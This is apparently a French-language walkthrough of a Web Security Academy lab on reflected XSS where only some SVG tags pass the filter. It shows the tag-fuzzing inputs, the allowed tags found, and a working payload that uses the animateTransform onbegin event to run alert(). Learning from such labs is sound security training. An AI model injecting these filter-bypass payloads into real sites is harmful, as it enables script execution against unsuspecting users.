XSS réfléchi — balises SVG autorisées

Reflected XSS with some SVG markup allowed

Lab: Reflected XSS with some SVG markup allowed | Web Security AcademyWebSecAcademy

Vulnérabilité XSS réfléchi simple. L’application bloque les balises HTML courantes mais laisse passer certaines balises SVG et certains attributs/événements. Objectif : déclencher alert() via une balise SVG.

Les balises HTML classiques sont bloquées.
On effectue un bruteforce/recensement des balises autorisées.

Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security AcademyWebSecAcademy

Réponse du serveur / tests montrant les balises trouvées : animateTransform, image, svg, title.

<svg><animateTransform a=1>
<svg><animateTransform%20§a§=1>

Tests d’insertions successives :
- <svg><animateTransform a=1> — insertion basique.
- tentative d’encodage / variation de l’espace : <svg><animateTransform%20a=1> — pour contourner le filtrage.
On repère l’événement disponible onbegin sur animateTransform.

<svg><animateTransform onbegin=alert(0)></animateTransform></svg>

Mis à jour il y a 2 mois

Ce contenu vous a-t-il été utile ?